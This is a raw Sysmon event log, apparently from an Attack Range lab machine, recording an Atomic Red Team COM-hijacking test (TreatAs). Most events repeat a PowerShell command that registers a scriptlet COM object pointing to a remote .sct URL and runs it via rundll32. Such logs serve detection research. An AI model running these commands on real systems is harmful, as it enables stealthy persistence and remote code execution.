154100x800000000000000025995967Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.196{D271FDA4-EFEA-6331-AFEA-020000007402}6408C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs /ve /T REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""} 154100x800000000000000025995951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.187{D271FDA4-EFEA-6331-AEEA-020000007402}6304C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E} /fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""} 154100x800000000000000025995935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.178{D271FDA4-EFEA-6331-ADEA-020000007402}1644C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID /ve /T REG_SZ /d AtomicTest /fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""} 154100x800000000000000025995919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.169{D271FDA4-EFEA-6331-ACEA-020000007402}7152C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL /ve /T REG_SZ /d https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct /fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""} 154100x800000000000000025995903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.161{D271FDA4-EFEA-6331-ABEA-020000007402}5852C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID /ve /T REG_SZ /d AtomicTest /fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""} 13241300x800000000000000025995901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-26 18:31:06.157{D271FDA4-EFEA-6331-AAEA-020000007402}292C:\Windows\system32\reg.exeHKU\S-1-5-21-2251518177-1696790515-3014453336-500_Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\ThreadingModelApartment 12241200x800000000000000025995900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-26 18:31:06.157{D271FDA4-EFEA-6331-AAEA-020000007402}292C:\Windows\system32\reg.exeHKU\S-1-5-21-2251518177-1696790515-3014453336-500_Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32 154100x800000000000000025995887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.152{D271FDA4-EFEA-6331-AAEA-020000007402}292C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32 /v ThreadingModel /T REG_SZ /d Apartment /fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""} 13241300x800000000000000025995885Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-26 18:31:06.149{D271FDA4-EFEA-6331-A9EA-020000007402}2512C:\Windows\system32\reg.exeHKU\S-1-5-21-2251518177-1696790515-3014453336-500_Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\(Default)C:\WINDOWS\system32\scrobj.dll 12241200x800000000000000025995884Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-26 18:31:06.149{D271FDA4-EFEA-6331-A9EA-020000007402}2512C:\Windows\system32\reg.exeHKU\S-1-5-21-2251518177-1696790515-3014453336-500_Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32 154100x800000000000000025995871Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.143{D271FDA4-EFEA-6331-A9EA-020000007402}2512C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32 /ve /T REG_SZ /d C:\WINDOWS\system32\scrobj.dll /fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""} 154100x800000000000000025995855Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.134{D271FDA4-EFEA-6331-A8EA-020000007402}4200C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC} /ve /T REG_SZ /d AtomicTest /fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""} 154100x800000000000000025995839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.126{D271FDA4-EFEA-6331-A7EA-020000007402}4496C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC} 